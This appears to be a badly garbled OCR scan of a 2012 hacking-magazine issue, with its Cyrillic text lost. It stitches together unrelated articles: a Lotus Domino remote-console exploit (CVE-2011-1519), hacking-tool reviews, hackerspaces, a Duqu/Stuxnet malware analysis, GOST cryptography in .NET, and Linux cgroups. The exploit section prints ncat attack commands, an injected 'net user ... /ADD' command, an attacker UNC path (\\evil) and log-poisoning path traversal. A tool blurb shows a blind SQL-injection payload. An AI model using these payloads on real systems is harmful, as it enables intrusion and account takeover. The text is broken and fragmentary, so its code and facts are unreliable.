#UI #COOKIEFILE. ,
, ,
Nt-
01 /156/2012
069
admindata.xml. , no n,
[ NOT_REG_ADMIN !'
LOAD CMD.exe
BeginData
net user add username password /ADD
<<
. n
n
#APPLET ,
adm, n
cookie .
~.
n #UI, n
veifyAppletUseCookie:
, #COOKIEFILE.
,
//#COOKIEFILE <cookieFilename>
i f (cookieFilename == null 1 1 cookieFilename.length()
return flag;
/ / - !
File file = new File(cookieFilename);
#EX IT
,
' ? n
,
LOAD, n
n.
inputstreamreader = new InputStreamReader(

new FileinputStream(file), "UF8" );
,
n . , IBM
LOAD
// s7do {
if ((j
cookieFilename
, n.
, m-, n , n
s7.indexOf( "<user " , j)) <= ) break ;
. LOAD
n , n n
String s2 = getStringToken(s7, "user=\"", " \ "" , j, k);

String
s =
getStringToken(s7, "cookie=\"", " \ "" , j, k);
String s4 = getStringToken(s7, "address=\"", " \ "" , j, k);

i f(s5.equalslgnoreCase(s2) && s6.equalsignoreCase(s3)
&& appletUserAddress.equalsignoreCase(s4)) { // !
flag = true ; break ;
ncat --ssl tagetlotus_host

#API
25
#L
#COOKIEFILE \\fileserver\pulic\cookie.xml
#USERADDRESS dsecrg
#UI usr,psw
VALID_USER
#
$whoami
whoamiBeginData
while ( true );
, n
usename, passwod addess usename, passwod
Microsoft Windows [Version 6. 1 .761]

Copyright () 2eeg Microsoft Corporation. Al l rights reserved.
addess cookiefile, ,
n n' ,
:
1.
<us> .
2. usename, passwod, addess.
3.
4.
n ,
C:\Lotus\Domino\data>
n , n
n .
, n
#API , API Jv-, -

, ncat . ,
Lotus ,
n SMBRelay.
CVE-2011-1519
.
1.
C:\Lotus\Domino\data>whoami
NT AUTHORITY\SYSTEM
cookie.xml:
?
<user name= "usr" cookie= "psw" address= "dsecrg" >
, . ?
, -. - ,
n, usr .
2.
n ,
, n \\fileseve\puic\cookie.xml.
3.
n ncat:
c-..-.. ~no
'"...........
C'adlf.Ctt.&........Joo
Lqou-os.Fn,OJOcc:OII
c...
,..nw,_,...
C...tllll~ll:
ncat --ssl targetlotus_host

#API
25
#L
..._, L., ~
D~l'1to ,07 0c<~D!I'" .1'-l4
#COOKI EFI LE \\fileserver\puic\cookie.xml

#USERADDRESS dsecrg
#UI usr,psw
VAL ID_USER
#
070
01 / 156/2012
Lotu s,
S- ? ,
, UNC (
, !.
,
- . , IBM
, : cookiefile
.>> . ,
- \\evil\cookie\file,
1.
, : .\\evil\cookie\
file, UNC . ,
. , ,
SSL-,
[,
i,
ARP-POI SONING,
DoS -
mail . u l.
IBM! , cookief il e,
, - L-
2.
, .
L- . XM L,
- , [
' , , IBM,
l. ,
, ,
L- :
, ,
c ?xml version= "1 . 0" encoding= "UTF-8" ?>

cuser name= "admin" cookie= "dsecrg" address= "dsecrg" >
[,

.
Bla-a-acuser
! - ,
- ,
name= "admin" xXXxcookie= "dsecrg" Xaddress= "
dsecrg"NYA>
4.
>>
Java 6
ASLRI.
. .
. , , ,
1.
99
cookievalues Microsoft I
service ( \\n- Entel:
ncat targethost 49152

GET /<user HTTP/1.0\r\n
\r\n
HP/1.0\r\n
#APPLET
#COOKIEFILE .. \ .. \ .. \windows\system32\logfiles\httperr\
httperr1.log
#USERADDRESS http://twitter/asintsov
#UI admin,pass
\r\n
ncat targethost 49152

GET /user= "admin"cookie="pass"address="http :// site.com"
2. - :
#5oftware: Microsoft ! 2.0
#Version: 1.0
#Date: 2011-08-22 09:19:16
$whoami
NT AUTHORITY/5YSTEM
UNC,
2011-08-26 11:53 :30 10.10.10.181 52902 10.10.9.9

47001 / 1.0 GET cuser 404 - NotFound 2011-08-26 11:53:30 10.10.10.181 52905 10.10.9.9
47001 /1.0 GET name="admin"cookie="pass"address="
http :// site.c o;n '> 404 - NotFound -
- .
. -,
,
, .
: IBM
-, .
<user >> ,
-, ,
%20>> [ , !. ,
- [
, <use r >>
, LOAD TELL
( 404 NotFoudl .
!. -
3. ,
-, :
admidata . xml.

MD5. ,
4, 25 26 ,
ncat --ssl tagetlotus_host 2050
. ,
#!
, ' I
01/156/2012
071
Mar licq 884888, http://snipper.rul
scarletO
....
-
""""'
bit .ly/t l56m2

:
URL:
Windows
3. 14.y/r u/md5
Windows
URL:
......,...
,.,
. "'
Win dows
cel1697i845
URL:
bit.ly/v mJ2g8
-~
~
,""
'
'
..
:. ~
'
. ..:;:;
. .
~
~
'
MSSQ L lnjection Helper-
, n
SQL-
D5-
.
,
, -
MSSQL.
BarsWF- World Fastest MD5 cracker.
n n
n ,
, ,
n SQL-.
5-
? n
. ?
npor :
Brutus hashes. New generation>>
'
Microsoft
SQL Server;
GUI-
, ,
, ;
MD5;
, ,
u :
1.
2.
1.
. n,
Quad QX6700 [3,01 GHzl

200 n
3.
'
4.
'
MSSQL lnj ection Helper
,
,

URL
[, site .com/script.asp?id =11
.
2.
lntel 2
Radeon:
AMD BROOK,
CUDA
NVidia.
:-1
072
n;

, n .
n
.
,
.
6 131 066 257 801
01/156/2012
X-Tools
PANBu ste - ,
Mastecad, Ameican E xpess,
, l
:
Security
! .
1000 BINI;
PAN
My5QL, M55QL l-l,
P ostge5 QL , Exce l, VMwae VM DK, l
PAN ! ! .
!);
PCI 055,
, PANBuste
I.ZIP,
.GZ, .TGZI;
PCI Q5A,
Research Labs
URL:
www.xmco.fr/
panbuster.html
.
: -
*nix/win/mac
JCB, D iscove,
Chia Unionl;
!
Windows,
L i u x,
05 ;
IV15A,
:
I
1./pabuste
-1 ../1 ,
!
- -! .
YGN Ethical Hacker

Group
URL:
URL:
bit.ly/vZbhcN
:
it.ly/vDpEtB
Windows
SuRGeoNix
URL:
~ ----..
it.ly/IXxlkm
=-
Windows
*nix/win
'~
WEBSURGERV, _ __

OWA5P Joomlal Vulneability 5canne-
W5'
, sn- . ,
. ,
, 55,
Joomlal
Web5ugey : -,
5QL-
. ,
Do5
WAF,
- .
. , DDM g -
- .
sn-
n,
WAF
5Q L-.
vuln.php,
1. n llnitial Requestl:
5- .
HTML-
! ,
);
My5QL
GET /vu ln.php?id=

HOST : 1.2.3.4
2.
/1.1
IList Configuationl :
- 1 32l MD5-
DDMg
xe al, -
. :
.
,
3.
joomscan.pl -u http: // joomla-site.com/ \
- pro xy: port
01 / 156/2012
GET /v uln.php?id=1+and+'${List_2}'=
substring((select+password+from+admin+
limit+1),${List_1},1) / 1 . 1
HOST: 1.2.3.4
073
071,
01/156/2012
, ? H ackespace
hackspace- ,
. ,
>>
I.
n .
. ,
n, ,
, ,
, , .
, ,
- ,
, >>
n . ,
, ,
, . -
, n
do it youself
[ ]. , -
{neuron}
.

,

.
,
,
-
,
.
,,
01/156/2012
075
:1.

,
,
-
,
. ,
,
ha ck e s pa c es.og ,
,
. - ---
.
, ! .
<< ,
.
,
>> ,- ,

Nu
l n e u o nsp ac e . u ).
<<
. ,

FOSS Labs
C-Base. n !
:
, ,
-,
, ,
N u
! ,
, -. ,
- ,
<< :
leSage lab,
, , ,
, ,
. ,
. ,
30-50
1000-1500
. ,
, -
, - ,
, -
, , ,
- : D- ,
. ,
, ,

C-base
London Hackspace (LHC)
NYC Resistor
: www.c -base .org.
: londo n.hackspace .org .uk .
n : , .
n: , .
n: , - .
: 300+.
:
: 300+.
:
: 30+.
5 .
076
17 .
C-base
1995 .
2009 ,
www.nycresistor.com .
11
RESISTOR
$75-115.
NYC Resisto-o
2008 .
01/156/2012
], IFaiwaves, ]
leSage laI .
Ust of Hacker Spaces
l'hls 11 1 comprehenslve, user~al ntalned lllt of 111actJve hecklrtPICII throughout the wortd.
. , ,
f-J>>,
,
.
, , , ,
We hiiVt: ilbll il ~at D( p!atd Hickgr SQIC!J 1 1 WI M1 1 8 !jst pf hackt[!iDiiCO'i t:rtJnd

1>t:ddahackcr~pacc
th4i
giObl including thOII 1til
in
uilding PfOCIII 1 t:lrlildy
c loaed.
Ustoft:vt:ntli
his ~
is cac:had dua to its long renOenng time . lf you want to tluah tn.
, ~
LRtof~WC>Jt:ds
Liep
:o-addaproject
iltii/W
)'1)
1 Tt lflln 1
Recenlchanou
1 ""'''"' 1

, .
- ,
, ,
Aall!tlld o:NIIOCI
SOoocitol pt: gt:l
--
~
.
Z;,;Ic
:0-:"-:--iljiL-'
t-,1
lfwt:'rt: tnllling YOtil
. ,
sp.t:, 01'
yOtJ wt:nt
t:nd,f ~ alt.lt
hadr.erspace
to c railtt: new
orr , /801 51 ~
to th4 h t .
C-base .
bttpl/aQLadwrtrtChprgdl
NOvemII'"
....
PILAIO
OSG - Optn
lgrj1tpry
1i11:IJJ:i
--
n:_
"'"
Nove mef
, .
. ,
htI/www ISJ!Dtrk,ac
cpmrf
Novernt>.r
, ,
, - , ... ,
:]. ,
2011
, .
Nu
u s . u .
. ,
!
30-]. Nu
dui. ,
, , .
. ,
! -
<<
Softwae Defied
, , , :
WiMAX GS
. ,
?.
D-. ,
, ,
. ,
Nu,
Radio,
15-17 .
15 ,
150,
, .

,
iberpipa
Metalab
: www.kiberoipa .org .
: , .
: 20 40 ,
n.
Ca : www. metalab . at .
: , .
: 130+.
:
>> -
!
, ,
,
20 .
: .
18'.
kiberpipa
___:_ _ _ _ _ __.J
. , 2001
2006 .
, ,
-.
01 / 156/ 2012
, !,
Metalab
].

>>,
!
- HackSpace Sait-Petesbug,- -
077
.
- .
,
.

<< : -
3D-, ,
n , , n
3D- -
.

,
~
, , ,

n ( hackspace-spb.u ].
n .
,
,
, (
(polakumekay.
com]. ,
29 .- .
, . n,
Mifill] : , -
: <<
. -
. ,
40 . -
, .
. : ,
. ,
, .
( ]
. ,
, .
, ,
n C-Base, , ,
078
01 /156/2012
. ,
,
[Space Foundation
, !,
,
,
~
. ,
, .

Neuon .
100 .
120 .
[ !,
.
<< :
.
, ,
. n
NYC Resistor
. ,
. , ,
, , ,
:1.
-,
,-2.
[, -
Neuon n
$50-100,
, !,
n .
[, ,
, n
10-30 !. ,
. , ,
- ,
- ,
, ,
- .
C-Base
, ,
300.
- . C-base
HackSpace-SPb
. ,
, ,
, .
, .
?
~
, , <<

, ,
Space Foudatio, -
. :::
? .
-
-
NYC Resisto.
, , MakeBot,
30-.
-
30 .
. ,
-
.-
NYC Resistopoca:
. ,

. :1
,
, ,
. ,
,
01/156/2012
200-300 -
079
MALWARE
Senior malware researcher, ESET
.....
Stuxnet
IDA
Stuxnet,

. ...
WIN32/DUQU:
Certificate
- . -
General 1Details 1Certification Path 1
STUXNET
~ Certificate lnformation
This certificate is intended for the following purpose(s):

Ensures software came from software puiisher
Protects software from alteration after puiication
,
RSS- .

* Refer to the certification authority's statement for details.

Issued to:
-Media
Stuxnet ...
. ,
Electronics Incorporation
Symantec,
, - , - -
sh
Issued : VeriSign Class 3 Code Signing 2009-2
Stuxnet
Duqu. ,
Stuxnet. , Duqu
Yalid from 8/2/2009 to 8/2/2012
, Stuxet.
=1
Instal Certificate ..
Cyptogaphy
Issuer Statement
and System Secuity (CySyS].

Duqu, Stuxnet,
. , CySyS
-
080
Duqu
, .
1. - !
01 / 156/ 2012
void
Verity Certificate
OtcrRoutit~e ( int ,
<'~
.. ...
chr
Yff~r .
int
lkrff~rSiz
,.,
Common Name: C-t.le<!ia Electronics lncorporation

Status: Revoked
Jb
sh01' t
'"
test
Validily (Gt.l ): Aug
2009- Aug 2, 2012
Class: Digila! IO Class - Soft\'l are Va lid ation

FreeReplacement
-
&uffl!rSizt
l_129!
[ +8 ]
edi , Bufftr
[es i +r:di ] , cl
~l
Microsoft Soft\'lare Validation v2
-......,
,
City/Location : Taipei
Serial Number:
t:cx ,3
State: Tai\1an
Country:
esi, es1
loc_12919 ~
Organization: C-Me<!ia Electronics lncorporation

Organ izationa l Unil: Digilai iD Class
ea: ,8471122h
I!CX
edx,
1E2060A3n
eu ,
....
ex ,4747293h
edx , OCh
loo
t-<fx , (edx+ l!iiX+l )
add
I!Si , l
'"
,
esi , ebx
~.
jb
04e931f57 ebc5947d3dc4e e 7a236e
edlf,
short
l_129 10
loc_l293A~
lssuer Digest: 2a48d0fcac3ca29d9a34 fff50b2c29f
esi
.2. .
4. n
IU:teiiiili
Duqu
5.
Stuxet
, .
cmi4432.sys,
, ,
, VeiSign
Duqu,
Stuxet,
C-Media Electonics lnc. ,
2012 ! 1].

Duqu :
0) d-,
, CVE-2011-3402.
1) -
. ,

.
w i32k. sys.
2) -,
DUQU
,
,
3)
4)
Duqu
3.
, .
n ,
sevices .e xe
. ,
Duqu
. .
n , .
Duqu
Stuxet .
Duqu
4.
-, .
Duqu
, , ,
, -
Name
Stuxnet.
5
Stu xnet, 6- Duqu .
Size

LJ 566168ff21437205807
LJ Oeecd17621535878724fd800
LJ 94c4ef91dfcd0c53a96fdc387f9f9c35
LJ 4541e850a228eb69fd0f0e92462445
u 9749d38ae9b9ddd81b50aad679ee87 *
b4ac366e24204d821376653279cbad86 *
u e8d6b4dadb9ddb58775e6c85O6cc *
192,512
24,960
6,750
29,568
85,504
232,448
6,750
[,
) : , ,
, , , , , , .
, .
, ,

Duqu
Stuxet.
,
. ,

,
. .
01/156/2012
Stuxet,
Duqu.
081
MALWARE

, .
Win32/Duqu,
n,
n .
, n , n n
n n .
,
Duqu
, !
, !.

. ,
.
7. n
main.dlliocoo
Duqul,
U-.
def dec rypt( data) :

gamma = (02,
7 ,
n .
072, 073,
034, 099,
0x7l,
098, 0)
= 0
<<Duqu: the
for ix in xrange(len(data)) :
data ( ix] = ga!.ma ()
= + l
if == 7:
us
to the next Stuxnet>>
36
. ,

n ! 81.
=0
, ,
, , n -
8.
time of infection
to live
.
9.
time of infection
to live
.
10.
14.10.2011
1.11.2011
3.11.2011
4.11.2011
Duqu: the precursor to the t Stuxnet>>,
Microsoft Security Advisory 126396581,
!, ,
!.
Win32/Duqu.
CrySyS
19.10.2011
ICVE-
CVE-2011-3402
Microsoft
Active Protections Program
IMAPPI.

2011-34021,
wi32k.sys
CrySyS, Symatec
Microsoft .
CrySyS.
TrueType .
,
.
082
01/156/2012
1 -~ "i.
!..-. ; -
~-~ ,. .?J
SD-
r-

l
-- r==:::: .
r:::-1-,---'--;
1-day
0-day
~ <non""'"" RPC-np""'"'

11. RPC Duqu
( )
, ,

36 ,
30 .
11.08.2011,
36
7:50 :01
, 9,
18.08.20 11 , 7:29:07
R-
30 -
10.
DUQU VS STUXNET
R-
Visual ++
ATL
UPX
Stuxnet vs. Duqu
Duqu St uxnet. R-
Stuxnet. Duqu n ,
n <<Stuxne t unde
RpcHandler_ '-
the Mi coscope l.
CeatePocessll;
56-57),
n.
RPC
Rndl_S - (,
n Duqu BinDiff,
);
Rndl_6 - ;
11).
Rndl_7- .
, n
Duqu . RPC :
RpcHandler_1- ;
RpcHandler_2 -
12.
R -
Rndlr_- ;
?

-
Stuxnet
80
: ) ,

<<?>>.
,
. ,

. , Stuxet, Duqu

. ,
Duqu,
,
,
r .
- ,
.
, , ,
.
12.
01 /156/2012
Duqu . :::
083
- - .- __ _
-------.---..._
-... ----------------...
--.----...
------
---------______...... ---..-
___
...._
___
-___ __
-----..
--------
__ ___. . __
-----.....
----~
...........
,",__,_
-~--~....
....
~---....
....
...,_,""__
1
2-
W.1r 3
<tr -1
<~
11 ~ >
.. .
(>~ n .. .
.. .
Program: C:\Program Files\Rising\RIS\rsmain.exe

r: lv! BR-ce op
:
1i32/ G h odo N. NA D
r1
ESET
This application has requested the Runtime to terminate it in an unusual way.

Please contact the application's support team for more information.
r
11 . r 1
.
Program: C:\Program Files\Rising\RIS\RsTray.exe

nII
r r1 ,
11
11.
This application has requested the Runtime to terminate it in an unusual way.

Please contact the application's support team for more information.
Preview
UNIXOID
"NRID
gd,
-
,
d id- .
,

firmware.
,
,
,

,
,
, G- . .
-
did-
.
. 1
. 2 .1
8 1.2 81.1
--
. . . .
, ,. , , , .
,,.
.-
-.
Microsoft. -.
. su .
SYN\ACK
11
>> ?
, , ,
SYN\ACK
UNIXOID
01/156/2012
<<

100 .
.
?
FERRUM
-NS'
Petium
ID--su!
, 12

NAS'e .

,
,
. .
087
plaintext [f i stlaplaintext.su, www.plaintext.sul

OCCTEMO.NETFRAMEWORK
Stong name
- n ,

, ,
.NET
F amewo k,
System.Secuity. Cyptogaphi,
,
CL R
.N ET
F amewok
.NET,
SYSTEM .SECURITY.CRYPTOGRAPHI
, ,
System . Secuity.Cyptogaphi,
-
n
[].
- ,
, - . .;
-
, . . ;
htto: Uaacbowse r.
ogsoot .com/ -
GAC
ws.
.509 L-
[XM L Sigatuel.
,
,
bjt.[y/uyxZs5
- ,
28147-89
088
F amewok
.NET
#.
[.
1]. ,

Symmeticlgoithm, -
01/156/2012
.N-
AssymeticAigoithm, - HashAigoithm
KeyedHashAigo i thm ,
-.
.NET
-1
, ,
.
28147-89
, ,
~.
SYMMETRICALGORITHM
.NET Famewok
SymmeticAigoithm.
MSDN,
puic
puic
.........._
RSA
DE-DEOES
--
pulic
OSA
AES
RC2
puic
-.._
virtual ICryptoTransform CreateDecryptor();

virtual ICryptoTransform CreateEncryptor();
abstract void GenerateiV();
abstract void GenerateKey();
----
.n
11
1
1 4
1 LJ
1 4 ~
1_, _ _
11
11
4
11
11
4
1
LJ
1
4 ~- ~
,. _
~ : """"""" ~
~ 8fiiOPIIIIII
11
Ass)'metric:~
Ass~uici<~Jonnanor
Ass~U.~
..__
T~S
11
J
1
1
1
IS1
~S
1 --1
1
1
1
......."
$A51 2anaged
.N
1
J
1
1
...,.
1
4...".",....._ 1
.......
1
-~
1
...... _
1
--1
1 -
1
1
1
1
"""""
.....,..
....,.._
...."....,_
Framework
,
,
namespace Gost
. ,
ICyptoTansfom .
puic
MSDN
. ,
class GostCfb : SymmetricAlgorithm
ICyptoTansfom
pulic
. :
pulic
byte [] rgbKey,
byte [] rgV
int TransformBlock(byte[] inputBuffer,

int inputOffset, int inputCount,
byte [] outputBuffer, int outputOffset);
){}
puic
byte [] TransformFinalBlock( byte [] inputBuffer,

int inputOffset, int inputCount);
puic
MSDN
, ,
){}
puic
[) .
{}
28147-89
override ICryptoTransform CreateEncryptor
byte [] rgbKey,
byte [] rgV
SymmeticAigoithm, ,
over r ide ICryptoTransform CreateDecryptor()
{}
n
, - .
GostCfb(){}
override ICryptoTransform CreateDecryptor
puic
puic
override ICryptoTransform CreateEncryptor()

override void GenerateiV(){}
override void GenerateKey(){
, . ,
.NET Famewok'y
, ,
[CFB).
,
.
KO,LJ,M 28147-89
private static byte [] GetRandomBytes( int bytesCount)

Qivate static void Gamm( byte [] input,
byte [] gamma, byte [] output)
, 28147-89
[ )
,

.NET Famewok'a CFB.

GostCfb,
.NET
FRAMEWORK'Y ,
,
CFB (r )
01 / 156/2012
(CFB)
089
Gost"
010
~~CickOnce
--
i:.Of.'llj~
..,
l1nl
~rw.....,.~
CJI(:t.a~
!..,1
....,
---
.J
rl
- << >>,
. <<>>
[ , ] ,
....
'""'"""''
[ , ] .
, .
........
~eqlo!IA/I-crpororo~
"
'"--
ToA~oU~OJIO....I"'CCIaQ
8 ~~r:nt1113~-N111,Uf,
010 [object
identificato],
010
[,
XOR . ,
] ,
, .
GetRadomBytes
GeeateiV Gt:
lacs], :
010
IVValue
KeyValue,
"{joint-iso-itu-t(2) ds(5) attributeType(4)

distinguishedName(49)}"
. , ,
64 256 .
"2.5.4.49"
puic
GostCfb()

{
LegalBlockSizesValue = new []
{ new Key5izes( 64 , 64, ) };
LegalKeySizesValue = new []
{ new Key5izes( 256, 256, ) };
BlockSizeValue = 64 ;
KeySizeValue = 25 6;
]. ASN.1 ,
,
-
.
www. o i d- ifo . c om .
ASN .1- - -
tnt
tt, GostCfb
, ICyptoTansfom.
ASN .1
ITU-T, ,
private sealed class
GostCfransformEncr:ICryptoTransform
{}
private sealed class
{}
GostCfransformDecr:ICryptoTransform
KACCGOSTCFBTRANSFORMENCR
tnt
-
, ,
, CFB,
. GostCfb.
, << ,
21 , ].
, .
!] ,
.
OID
11
private byte [] m_Key;
11
11
private byte [] m_State;
11
private byte [] tmpState;

puic
090
int TransformBlock( ... )
01/156/2012
.N-
r~at~ ();
byte[] plainBlock
int result = ;
{Gost.GostCfb)
64
new byte[ 8);

new
imitoStr :
CryptoStr~am ~ncr
while (inputCount >
CryptoStr~am
11
Array .Copy(inputBuffer, inputOffset, plainBlock, , 8 };
Gost28147 . Gost28147Ecb(m_State, tmpState, m_Key);
Gamm(plainBlock, tmpState, m_State);
Array.Copy(m_State, , outputBuffer, outputOffset, 8}
inputCount -= 8;
inputOffset += 8;
outputOffset += 8;
result += 8;
CLR
28147-89.
return result;
16
16 ! . , ,
HashAigoithm, , ,
. ,
KeyedHashAigoithm :
XOR.
, ,

28147-89 Gostlmito.
Ke yVal ue
Ha shVa lueSize 32,
32 .

TansfomFinaiBiock
TansfomBiock , n n .
,
,
HashCoe
- ,
GostCfbTansfomDec
GostCfbTansfomEncr,
lnt enai Tansfoml .
CFB,
, ,
[ ,
!.
, :
DWORD,
16-
KEYEDHASHALGORIH
KeyedHashAigoithm .
HashAigoithm ,
:
protected abstract void HashCore(

byte [) array, int ibStart, int cbSize)
protected abstract byte [) HashFinal(}

--"""'
[~ <CLR2..0
"'""""
0 Solod111No
CLR_.
[8 !
.....t1
\ stmyNemt
lPui~eJ
FSI\Ilp.Lqu.;Servic
FSharp.Pfojtct9-JS\tm.FShlfD
- !~- ;::::~~-::Syattm.PrOPtltYP~s
11-
!Cuituf
0.300flld5
FSI-.rp.\.lgu.;t~S.Vict..It
FSI\arp. Proj\Syl !t.S.It
I.A.-thittctur lv.,.,lon
MOL
09.112010192' :24
09.1120101924:24
09.11 .2010192:24
09.1120101t.24:24
0911201019:2.t:24
""'
M9L
1.00.0
""'"'"
MOL
MOL
03fSf7/11dS
0)15f71tlc!S
0f5f7f1 1d5
hDJMH >d<
GosiAig1
90881J818cl
IE~'::'~"IIVIn
;:;;~;~~
~
SIL
lEost
~fllciS
II Eoat
0300111!5
lnlttoo.SDocVw
lf:k'57eO
U9L
U9L
U9L
ISym\Jptt
ISym\oJr,pper
03f5f7111c!5
32il
~f11d5
S:.!
ISym\oJr~Ptf
"i111!5
)2bll
Of5f1f11d5
S:il
31f38~
MOL
U9l
IS.,.m\kpper
......
~...
01/156/2012
31f3856ad3
GAC Browser
i ~.ttoclified
4.0.0.0
4.0.0.0
4.00.0
4.00.0
""'
""'
03f5f7f11d5
.:.
2.00.0
2.0.0.0
2.0.00
11.00
2.0.0.0
2.0.0.0
400.0
400.0
6.10.0
6.1.0.0
2311201119~1 :5:5
~ -
"''
v4.0
v4.0
v4.0
v4.0
V4.0
'N"'""'
~
14 0720096:20:09
DWORD,
n 16-
[En c yptBiock161,
.
DWORD
, -,
[XOR DWORD
, XOR !,
, .
140720096:20'09
140720096.20-09
10. 1120101952.
14072009620'09
14072009620:09
09.1120101913.36
09112010191].:1
1: 07200910;: 7:27
1l07200910;47:27
uint templnH = Gost28147.Bytes2Dword(array,

( i nt )(ibStart + i * 8));
uint templnl = Gost28147.Bytes2Dword(array,
( int )(ibStart + i * 8 + 4}};
uint tempOutH = ;
uint tempOutL = ;
Gost28147.EncryptBlockl(ref templnH, ref templnl,
ref tempOutH, ref tempOutL,
Gost28147.P, KeyValue);
ulmito = tempOutH;
HashFinal
.
vl .O
,,,
F amewok
.NET
GAC.
GAC
.NET,
GAC, Global Assemy Cache [
091
! .
GAC
oidMa p
oid Ent y.
. ,
, st ong
name,
, .
,

sn .exe,
.NET
<cryptographySettings>
<cry ptoNameMapping >
<c ryptoClasses >
<cryptoCla ss GOSTCFB; "Gost.GostCfb, GostAlgs,
F amewok. :
Version;l.e.e.e,Culture;ru,PulicKeyToken;9be88f4818daa492" />
sn.exe -k keypair.snk
Version;l.e.e.e,Culture;ru,PuicKeyToken;9be88f4818daa492" />
<cryptoClass

keypai.sk.
Sig nig
Sig n the asse m y
31. .
gacutil,
GAC
[.
, .
.NET Fame wo k .
.NET,
GAC .
gacutil / i
<
>
Pu ic k, Cultue
GAC l,
GAC ws [. 41.
GOSIMIQ; "Gost.Gostimito,
GostAlgs,
</cryptoClasses >
<nameEntry name; "GostimitoAlg" class; "GOSIMIO" />
<nameEntry name; "GostCfbAlg" class; "GOSTCFB" />
<nameEntry
name; "System.Security.Cryptography.KeyedHashAlgorithm"
cla ss; "GOSTIMITO" />
<na meEntry
name; "System.Security.Cryptography.SymmetricAlgorithm"
class; "GOSTCFB" />
</cryptoNameMapping >
<oidMap>
<oidEntry OID; "1.2.43.2.2.21" name; "GostCfbAlg" />
<oidEntry OID; "1.2.43.2.2.22" name; "GostimitoAlg" />
</oidMap >
</c ryptographySettings >
Wind ows,
.NET
GostCfbAig
Gost lm ito.
GOSTC FB
GOSTIMITO,
GostCfb, GostlmitoAig
.
machine.cofig,
XM L

cyp togaph ySet ting s,
mscolib.
Name Mapping.
<na meEntry
name; "System.Security.Cryptography.KeyedHashAlgorithm"
class ; "GOSTIMITO" />
<nameEntry
name; "System.Security.Cryptography.SymmetricAlgorithm"
class; "GOSTCFB" />
:
n cy ptoCia ss,
nameEnty. , ,
l.
010
KeyedHashAlgoithm
GostCfb,
Gostlmito
GostCfbAig
i mito
( KeyedHashAlgoithm )
toConfi
. CeatefomName ( "GostimitoA~.
new
'ect l
[ "i$ CryptoConfig System.Security.Cryptography.CryptoConfig
= new t
i mitoSt = new
CyptoSteam n
CyptoSteam
- -
SymmeticAigoithm.
51.
while (rdlen < totallen)

{
t
{key});
System.Secu
base {object}
object
(k, I V) , CyptoSteamode . Wite );
AllowOnlyFipsAigorithms false
yptoSteamode . Write );
; Non-Puic members
11 (i/ appNameHT
Count =
11 , appOidHT
Count =
11 if defaultNameHT
Count = 125
- DefaultNameHT
Count = 125
DefaultOidHT
Count = 28
defaultOidHT
Count = 28
, InternaiSyncObject
{object}
if MachineConfigFilename
.. "machine.config"
machineNameHT
Count = 3
{[GostlmitoAig, Gost.Gostlmito, GostAigs, Version=1.0.0.0, Culture=ru, PuicKeyToken=9088f4818daa492]}
{[System.Security. Cryptography.eyedHashAigorithm, Gost.Gostlmito, GostAigs, Version =l .0.0.0, Culture= ru,
{[GostCfbAig, Gost.GostCfb, GostAigs, Version=1.0.0.0, Culture=ru, PuicKeyToken=9088f4818daa492]}
,
RawView

092
CryptoConfig
01 / 156/2012
.N -
28147-89
28147-89
,
. ,
:
232
11
XOR,
[8 ! 4
mod 2321,
. [
[SBoxl,
.
31- ,
32
28147-89,
8 .
.

.
7.
KeyedHashAigoithm.Ceate,
.
CyptoCofig.CeateFomName,
Activato.Ceatelstace

catch.

ull .

oidMap
010
29
, CyptoCofig

010
. ,
MSON
, oidEty
[ , , GostCfI,
- ,
mt,
010
, - ,
,
machie.cofig .
010
ivt
machieOidHT, - -pivate
machieNameHT CyptoCofig !. 61.
28147-89
CLR
MONO PROJECT
- ,
CyptoSteam,
Steam.
. , ,
Mono,
GAC,
$ gacutil -i
< >
, ,
CyptoSteam ,
- :
- CyptoSteam .

$ gacutil -l
.
-
.
machie.config [ Ubutul /t/m/<

>/.
CyptoSteam
,
. ,
Positio - CyptoSteam.
- - . ::::
01/156/2012
.NET Famewok,
093
li v inside . og s p o t .c oml

.
- , :
.
, .
1100- xl 1 .
, ylxl = + 1100- xl 1.
, .
. ,
- , !
;1.
, , = 10,
50
50
19.
, !.
. ,
.. .
, .
. ,
09-'
01/1 56/201 2
,
, , '
,
.
, : lkl + llkl- 11 + .. . +
llkl- k + 11, k - , -
. ., ,
:
12 lkl- k + 11* k 12. lkl = 100 1 k + k 12- 1/2,

. :! , ,

200, , 14,
tokens = [ for i in xrange(len(tokensdict))]

#
for key i tokens:
tokens[tokens[key]] = key
t = timeit.Timer(setup= 'from __ main __ import func1 ' ,

stmt= 'func1()' )
prit t.timeit(number = 1 )
t = timeit.Timer(setup= 'from __ma i n__ import func2' ,
stmt= ' func2() ' )
print t.timeit(number = 1 )
.
:
$ python2 test.py
:
6.889592934
.ss8578
tokens = []
for token in tokeniter:
i f token not in tokens:
tokens.append(token)
600 .
Olnl,
.

tokesite- ,
, .
Oilog nl .
.
tokesite.

n ?
Linux.
if token not in
tokes: >>, -
Ol * ml, 1 < m < n.
cpulimit,
SIGSTOP SIGCONT:
, n
. ,
# cpulimit --pid=<pid> --limit= <value>
- , .
value ,
import random
import timeit
pid.
CPU, ,
4 -
#
#
f
99999
, 100%, 400 %.
cgoups ,
.
[]
for i in xrange( 1, 2 ):
f.append(random.randrange( 1,
1 ))
...
cgoups :
#
def func1():
tokens = []
for token in f:
i f token not in tokens:
tokens . append(token)
# n
def func2():
tokensdict = {}
i =
for token in f:
i f not tokensdict.has_key(token) :
# :
tokensdict[token] = i
i += 1
ft
01 / 156/2012
$ yaourt -5 libcgroup
________________________
095
,
:
group default {
perm {
task {
uid
root;
gid
root;
admin {
uid
root;
gid
root; }}
cpu
cpu.shares = 10; }}
, - .
: al , l

, .
! !.
,
group daemons/tomcat {
perm {
task {
root;
uid
root; }
gid
admin {
uid
root;
gid
root; }}
cpu {
cpu.shares = 4~; }}
Python.
, URL !
URLI, N
.
N,
1.
theadig ,
let, gevent, Twisted
event-
group daemons/postgres {
perm {
task {
root;
uid
gid
root;
admin {
root;
uid
root; }}
gid
cpu {
cpu.shares = se; }}
. , ,
.
filteed , .
:
;

mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;
!
, !.
: daemos/tomcat- 40
n :
postges-
%, daemos/
50 %, default -10% .
IP- - ! ,
. /etc/cgules . cof:
/, !:
<user>
*:tomcat
*:postgres
<controllers>
cpu
cpu
cpu
<destination>
daemons/tomcat/
daemons/postgres/
default/
# ifconfig ethe 192.168.1.123

# ifconfig ethe hw ether :1:2::4:s
, ,+
tomcat daemons/
tomcat , postges- daemos/postges ,
- n default.
, .
nmap, :
